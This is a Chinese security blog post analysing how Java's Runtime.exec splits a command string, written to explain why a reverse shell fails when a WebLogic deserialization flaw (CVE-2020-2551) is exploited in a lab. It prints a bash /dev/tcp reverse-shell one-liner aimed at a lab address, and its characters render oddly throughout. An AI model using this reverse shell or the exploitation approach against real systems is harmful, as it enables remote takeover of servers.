前言

遇到很多次在調(diào)用Runtime.getRuntime().exec方法進行彈shell的時候遇到的各種限制，都沒好好的認識認識原理，這次主要是總一個總結(jié)和原理上的分析。

環(huán)境搭建

之后使用docker起一個具有反序列化的漏洞的Java服務(wù)(能夠執(zhí)行命令就行)。

之后開啟調(diào)試的功能，

我這里直接就是用存在的weblogic的漏洞環(huán)境，直接通過發(fā)送T3協(xié)議數(shù)據(jù)包來觸發(fā)反序列化漏洞。

起因

我這里使用的是CVE-2020-2551進行利用，

我們首先進行curl命令執(zhí)行看看是否可以執(zhí)行命令。

接下來我們使用反彈shell的命令嘗試

bash -i >& /dev/tcp/192.168.153.1/8080 0>&1

按照正常的邏輯，應(yīng)該會成功的?。?！

但是，并沒有，如圖：

細節(jié)

我們跟進一下Runtime執(zhí)行命令的源碼。

因為對于linux和windows版本的JDK有一點小區(qū)別，所以我這里在項目依賴的位置將windows版的rt.jar包替換成了linux版的rt.jar包。

好了，言歸正傳，開始分析Runtime.getRuntime().exec執(zhí)行命令的邏輯了。

在Runtime類中的exec方法存在有多個重載，大致可以分成傳入的參數(shù)是一個字符串，或者是一個字符串?dāng)?shù)組進行命令執(zhí)行。

字符串執(zhí)行

我們首先來看看字符串作為參數(shù)的情況是怎么樣的。

在這個方法中將會調(diào)用this.exec((String)var1, (String[])null, (File)null)方法繼續(xù)進行調(diào)用。

在這個方法中，首先是傳入的命令不能為空，不然會拋出異常，之后主要是創(chuàng)建了一個StringTokenizer對類對象，傳入的構(gòu)造方法參數(shù)是我們需要執(zhí)行的命令字符串。

從該方法的注釋中也能夠看出端倪來。

使用通過調(diào)用 new StringTokenizer(command) 創(chuàng)建的 StringTokenizer 將命令字符串分解為標(biāo)記，而無需進一步修改字符類別。分詞器生成的分詞然后以相同的順序放置在新的字符串?dāng)?shù)組 cmdarray 中

所以我們可以跟進StringTokenizer類的構(gòu)造方法中

為指定的字符串構(gòu)造一個字符串分詞器。分詞器使用默認的分隔符集，即“\t\n\r\f”：空格字符、制表符、換行符、回車符和換頁符。

也就是使用這個類將命令字符串中跟據(jù)\t\n\r\f等字符來進行分割成一塊塊的數(shù)組，

主要的實現(xiàn)方法就是在exec方法中，首先調(diào)用StringTokenizer#countTokens來初始化cmdarray這個數(shù)組對象。

主要是利用skipDelimiters / scanToken這兩個方法來進行切片操作的

之后就是調(diào)用nextToken方法來為前面初始化的數(shù)組進行賦值操作

在分割成了數(shù)組之后調(diào)用exec的重載方法public Process exec(String[] cmdarray, String[] envp, File dir)

終歸還是回到了ProcessBuilder類對象的創(chuàng)建來，在Java中另一種執(zhí)行命令的方式就是通過調(diào)用ProcessBuilder#start()方法來執(zhí)行命令。

這里進行了environment / 工作目錄的初始化之后調(diào)用了start方法進行命令執(zhí)行操作。

這里獲取的是命令字符串的分割之后的第一塊，這個就是該命令執(zhí)行的環(huán)境，比如/bin/sh / /bin/bash這些。

可以注意到在其后面有一個System.getSecurityManager方法的調(diào)用，這個就是通過調(diào)用checkExec方法來判斷該次的命令調(diào)用是否合法，也是Java內(nèi)置的一種安全管理。

之后就是調(diào)用ProcessImpl.start方法進行執(zhí)行了，

最后將會創(chuàng)建一個UNIXProcess類對象。

傳入的第一個參數(shù)是/bin/bash這種運行環(huán)境，第二個參數(shù)就是后面緊跟的需要執(zhí)行的命令，

在這個類構(gòu)造方法中，將會通過調(diào)用forkAndExec方法來創(chuàng)建了一個進程該方法返回了該進程的PID號。

總結(jié)

使用Runtime.getRuntime().exec()方法執(zhí)行命令的時候，會將傳入的字符串命令，根據(jù)\t\n\r\f等分隔符進行分割，之后在進行命令的執(zhí)行。

數(shù)組執(zhí)行

如果傳入的參數(shù)是一個數(shù)組對象，來到的具體代碼就是在public Process exec(String cmdarray[])方法的調(diào)用中。

直接就來到了exec的重載方法public Process exec(String[] cmdarray, String[] envp, File dir)

在這個方法中，直接就將該數(shù)組對象傳入的ProcessBuilder的構(gòu)造方法中，之后調(diào)用start方法進行執(zhí)行。

總結(jié)

使用exec的數(shù)組作為參數(shù)傳入的重載方法，不同于使用字符串的重載方法進行命令執(zhí)行，具體到代碼中就是少了一步通過創(chuàng)建了一個StringTokenizer類對象來自動進行命令的分割，在某些情況下，將會造成命令不能執(zhí)行的情況，數(shù)組方式是直接傳入的自己已經(jīng)分好塊的命令數(shù)組進行命令執(zhí)行，Java便不會自動將本應(yīng)該在一起的命令分割開來造成錯誤。

本文作者：superLeeH， 轉(zhuǎn)載請注明來自FreeBuf.COM